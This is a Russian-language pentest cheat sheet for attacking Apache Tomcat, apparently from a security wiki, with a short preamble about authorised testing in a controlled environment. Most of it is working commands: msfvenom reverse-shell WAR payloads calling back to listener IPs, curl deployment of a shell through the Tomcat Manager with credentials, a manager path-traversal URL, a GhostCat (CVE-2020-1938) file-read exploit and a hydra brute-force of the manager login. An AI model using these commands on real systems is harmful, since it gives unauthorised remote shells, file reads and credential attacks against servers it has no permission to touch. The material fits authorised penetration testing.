Apache Tomcat

:::tip Формат страницы

Порядок действий описан по‑русски. В методике сохранены заголовки (частично локализованы типовые термины), таблицы, иллюстрации и блоки кода: команды и параметры на английском, без перевода синтаксиса.

:::

Порядок действий

Определите контекст (аутентификация, роль, границы доверия).
Воспроизведите вектор атаки в контролируемой среде или с явным разрешением на целевой системе.
Зафиксируйте PoC и влияние (конфиденциальность, целостность, доступность).
Примеры запросов и команд ниже — на английском.

Методика

Reverse shell

# Linux
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.122 LPORT=443 -f war -o revshell.war
# Windows
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.83 LPORT=9002 -f war > revshell.war

Tomcat Manager App

Upload via curl

# Deploy
curl --user '<USER>:<PASSWORD>' --upload-file shell.war <TARGET_IP>:8080/manager/deploy?path=/shell
curl http://<TARGET_IP>:8080/shell/ # The reverse shell endpoint

# Undeploy
curl "http://<USER>:<PASSWORD>@localhost:8080/manager/text/undeploy?path=/revereshell"

Tomcat path traversal

https://<TARGET_IP>/manager/status/..;/html/

GhosCat (CVE-2020-1938)

python3 ajpShooter.py http://<TARGET_IP>:8080 8009 /WEB-INF/web.xml read

Brute forcing

hydra -L <USERS.txt> -P <PASWORDS.txt> http-get://<TARGET_IP>:8080/manager/html

Порядок действий​

Методика​

Reverse shell​

Upload via curl​

Tomcat path traversal​

GhosCat (CVE-2020-1938)​

Brute forcing​

Ссылки​